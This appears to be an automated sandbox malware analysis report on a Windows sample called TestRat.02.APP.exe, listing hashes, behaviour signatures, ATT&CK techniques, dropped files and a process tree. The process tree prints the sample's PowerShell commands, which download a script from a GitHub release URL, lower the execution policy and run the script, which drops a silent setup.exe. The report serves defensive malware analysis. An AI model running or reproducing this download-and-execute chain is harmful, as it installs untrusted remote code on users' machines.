285600cafa0475b557b8f722dcc4628b7e7780a593c69fec0954046a45272ee8

Analysis

max time kernel
129s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
22/07/2024, 17:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TestRat.02.APP.exe
Size

139KB
MD5

6d75b31bfa691bdf32c0c9331c8b7ff7
SHA1

5387d89075eb924adca7318add02c0bca8812a9e
SHA256

fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f
SHA512

ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83
SSDEEP

3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/Daulaires/Daulaires/releases/download/Lester/Demo.zip

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
6	1448	powershell.exe
11	1448	powershell.exe
77	1672	powershell.exe
78	1672	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2240	powershell.exe
1448	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 1 IoCs

pid	Process
2012	setup.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\taskschd.msc	mmc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings	setup.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1512	notepad.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1600	powershell.exe
2240	powershell.exe
1448	powershell.exe
2240	powershell.exe
1600	powershell.exe
1448	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4804	mmc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe
Token: SeIncBasePriorityPrivilege	4804	mmc.exe
Token: 33	4804	mmc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4804	mmc.exe
4804	mmc.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 1448	2108	TestRat.02.APP.exe	86
PID 2108 wrote to memory of 1448	2108	TestRat.02.APP.exe	86
PID 2108 wrote to memory of 2240	2108	TestRat.02.APP.exe	87
PID 2108 wrote to memory of 2240	2108	TestRat.02.APP.exe	87
PID 2108 wrote to memory of 1600	2108	TestRat.02.APP.exe	88
PID 2108 wrote to memory of 1600	2108	TestRat.02.APP.exe	88
PID 1672 wrote to memory of 2012	1672	powershell.exe	124
PID 1672 wrote to memory of 2012	1672	powershell.exe	124
PID 1672 wrote to memory of 2012	1672	powershell.exe	124
PID 2012 wrote to memory of 5064	2012	setup.exe	125
PID 2012 wrote to memory of 5064	2012	setup.exe	125
PID 2012 wrote to memory of 5064	2012	setup.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe
"C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Invoke-WebRequest -Uri https://github.com/Daulaires/Daulaires/releases/download/Lester/quick_setup.ps1 -OutFile quick_setup.ps1
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" .\quick_setup.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1600

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4804

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4012

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\quick_setup.ps1"
1⤵
- Opens file in notepad (likely ransom note)
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1672
- C:\Users\Public\Desktop\Demo\setup.exe
  "C:\Users\Public\Desktop\Demo\setup.exe" /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication C:\Users\Public\Desktop\Demo\Eleven.application
    3⤵
    PID:5064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d136d3411d4aa688242c53cafb993aa6

SHA1
1a81cc78e3ca445d5a5193e49ddce26d5e25179f

SHA256
00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

SHA512
282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dam2uiq4.sch.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\quick_setup.ps1

Filesize
465B

MD5
dc1d37b54dcee4e8b43f54772eba22f0

SHA1
64e58eb51f67b0b8d6b25e368b2ed13e0ca7b0fb

SHA256
11681c3f14427761e8a36acbe9f2cc611b01858e2c75c399412bec8c65c5fa2a

SHA512
6a6b053891961c219bd0fed957a03c2db79ef38013aca173f318000ca44b7a94e99895ab206f495869d7dac314e4d7a0e4df4aae9245ae2668c2004385f359db

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\Eleven.exe.config.deploy

Filesize
187B

MD5
15c8c4ba1aa574c0c00fd45bb9cce1ab

SHA1
0dad65a3d4e9080fa29c42aa485c6102d2fa8bc8

SHA256
f82338e8e9c746b5d95cd2ccc7bf94dd5de2b9b8982fffddf2118e475de50e15

SHA512
52baac63399340427b94bfdeb7a42186d5359ce439c3d775497f347089edfbf72a6637b23bb008ab55b8d4dd3b79a7b2eb7c7ef922ea23d0716d5c3536b359d4

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\de\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
9KB

MD5
cce365095b4827c48eb851b98b5ac86c

SHA1
a40b68adecdf3a7a529f5a0c46e748477602e115

SHA256
38be8d2583541f2bf60fcfd95eb2ec0f4570bf7ff445023600a2607633fe6ea2

SHA512
a5b58debb9cffc5834435ca40de27730f6934027eae4e46ee9cf3e0984ecf8fb9325fbf6287ca3c5b1897128d5059189bea4558e96815ed92611e69de7d5e4a1

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\es\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
1408dcf0e733feca14cbbbda7b4a917a

SHA1
8f7d65da58bcb153cb5addbb2c9ea6f3f2e41f74

SHA256
b54e7c0368dcbd350815a4207dfd144c8555997be60f2d8563590e11721aae45

SHA512
91dd79e002547c5fa07aa6d4f6eb0075ed1d7f8281156775cfb6ea6a9c7e4ddac4df9ef1160829a502917a4dd6cdec3b1439a37a2e8f4e82ebd40f0364536d60

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\fr\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
ff2447103c0b2ace6e06474ef44519fc

SHA1
9587566ff2cd6d3bc400f1e1300cef258127953b

SHA256
71a0ff1dcb30dcdc838ecdfebd788acd0f64c4eadb7bedbe473827c1fcca21a0

SHA512
395c24e3c9a5d1fde08125deff5233f3d22692611c50cfef32f32f38e047c3d31d0c26a007240d0b695651df5abe3cb7fafa2a89176186b9b753a4e866a066ff

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\it\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
219e3fca6ce9fd1a81f93204b5eff759

SHA1
c30dfada4ace03f52f9b9fbd640c33e0358ff0f3

SHA256
fd86b62d37f033217bf73cfce565b6ff7f647dcc0b0db346cff42e226aaae27e

SHA512
350936613a3f57b81bfed686a673682fe99fd9317cfc04b14a300d29f5b45b256e6315cdeb49afa38f7f7d0a312f614f32cf5f83ba0b89bba32997fb7e236727

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\ja\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
0d4f5ebed1fdbf4495827f480349b4d9

SHA1
0e90cec00d0c1702531de940a2259d819a38b1bd

SHA256
db4d7ccc6ff1a58d3cb94e5ab49d5d93943c64c35d10b283ed51191f9d3a655d

SHA512
d7c11e5fea1dbe98a93d2fe0b00b2e9dd6ebe77cbac559822c4d0e1071f0cab0a8e3bc992f6ed0ffd9f23f0af592dc906744415a9914ad337eb3946c9532fa0c

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\pl\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
650119802a82603072b8af317c1b220a

SHA1
c9636dab6314981dfb84029444a8ee7bca7ad782

SHA256
9a34ee28ae9a8364287517c993077afd139fea1f69086aa51345e1045b1287e9

SHA512
635c1462948d3d9817981d9d8182d3354911d2e7262f3fdda2df1f91538f2cf13d0329ea517d67c6e54ceb9d47547faba10a134b3ecc631ee5ceee54cf8de4ff

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\ru\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
a0c3f4f5d9a970e2e7859fe81ad1fcce

SHA1
c5084fe347dba5826e1a8371f1b83c5e25ac7e82

SHA256
4265a4010ea2fa79897333d8dbb0b4229d2d9aedeeb45fc47719d0b31355f480

SHA512
711220a3e0cab099af51887dd6fabcf22d5b8e102c6771d2d173a04a8fa22ea7752817e5554057a49d5681129604d94de95a5c2855f8dd674a2678d56eac69b6

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\sv\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
9KB

MD5
f733fcbdffe36b8e3c5e02af14d6d458

SHA1
55301694f0a4732e35bf8d1043f1318630c54057

SHA256
078047942ef77eba4bbda2a5f22d572b82a86f7060589aace64cb0c187d3942e

SHA512
2dcb6f72f2cc4daf095bd63e6741fb0a52dc01196197beed0cecc636f1dc91d076e0c8b3e5398172e6bfb6c470e1a244dcc90b631fe6528cd4ae9d000c76697f

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\tr\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
10KB

MD5
aace67685fd7644169aa26477abda8a9

SHA1
9bda66c81dfac4dc76efe52abb5d4e34438216f6

SHA256
0d4b98dd368ca2389d75d69e9e006c9e88564dbffcfc2216d3fab87c99785db4

SHA512
d31f2f991450668418ffca28958079c4237b5588c3a62d52225d1faeb0d10e6a5e89ad33e997977f083016219cdfe2ed45a735fcfc9b9babef4c2ac824e03205

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
9KB

MD5
d11238d12633e7ef9698a3c0780e8ebb

SHA1
6057cd2b0fd283a99ce0589a1a5913468743e1e2

SHA256
42570851b0a73df1a810133e5ce9b396ca820d8000f0d2fd24862ba5c1da1e63

SHA512
a052b578e6c130c7319493488b68b804b73ecc88b12aa6620093a18233a054e91e1e90e1736be53bb74c1829e7229af3a128f9557c1a6792b165d08c5fede45e

Download Submit
C:\Users\Public\Desktop\Demo\Application Files\Eleven_1_0_0_5\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dll.deploy

Filesize
9KB

MD5
b7a183a68c0ffd49074da859ccd79d1e

SHA1
d13f2ad7b6025175bc0473a6533e035fd697e1b5

SHA256
c845e45ecaf2d9852f80a7f56fede5eb33b70d2cbcd6c0bcccf5bc8d2b576336

SHA512
eeb149b81ed7f42829143f3080649d0fcb802e06c51ea21bc94d6fb94fa39efd0ebef46551564ccbfaef08a10442141f7573782e52380682bd4bdd9a9c3834d7

Download Submit
C:\Users\Public\Desktop\Demo\Eleven.application

Filesize
5KB

MD5
9138f7a65de2b71e19e5937b0a1937f0

SHA1
5a1157f39d4a5679845dd768b74e1aa7359c716a

SHA256
31f03b9f3e455ad89ce950f6f0ac1f25a45f6b9e714dac575b792f2d148e7e1e

SHA512
e73457532ad6db3787ccce691a333a4effcd61c54c04f569bb6b5c334fe6f243c00402a4676e0131898f4a66ee141b39a147254ea12ce93588971dce14a61a40

Download Submit
C:\Users\Public\Desktop\Demo\setup.exe

Filesize
552KB

MD5
ad1848193be64a450019fce578574080

SHA1
de6e57880b01402fd75e7fa2ed30b5c9519a0a76

SHA256
f28983daf13eb54a15eee49f1be496191972f99cc2bca90ce1296d8f9d602c22

SHA512
340c0a7d426c65d3c7c66c97a168e0dc12eef5ba2f8e53e068f26f8082731c4cf294e918f1788e8a367516ffdfd9e24be6944804a4050778f842828d5be0fb98

Download Submit
memory/1448-36-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1448-45-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1448-32-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1448-30-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1600-41-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1600-0-0x00007FFC5DA53000-0x00007FFC5DA55000-memory.dmp

Filesize
8KB

Download
memory/1600-20-0x0000021591470000-0x0000021591492000-memory.dmp

Filesize
136KB

Download
memory/1600-31-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1600-10-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/1672-67-0x00000216EEFF0000-0x00000216EEFFA000-memory.dmp

Filesize
40KB

Download
memory/1672-66-0x00000216F01B0000-0x00000216F01C2000-memory.dmp

Filesize
72KB

Download
memory/1672-62-0x00000216F0130000-0x00000216F01A6000-memory.dmp

Filesize
472KB

Download
memory/1672-61-0x00000216F00E0000-0x00000216F0124000-memory.dmp

Filesize
272KB

Download
memory/2240-33-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/2240-37-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download
memory/2240-46-0x00007FFC5DA50000-0x00007FFC5E511000-memory.dmp

Filesize
10.8MB

Download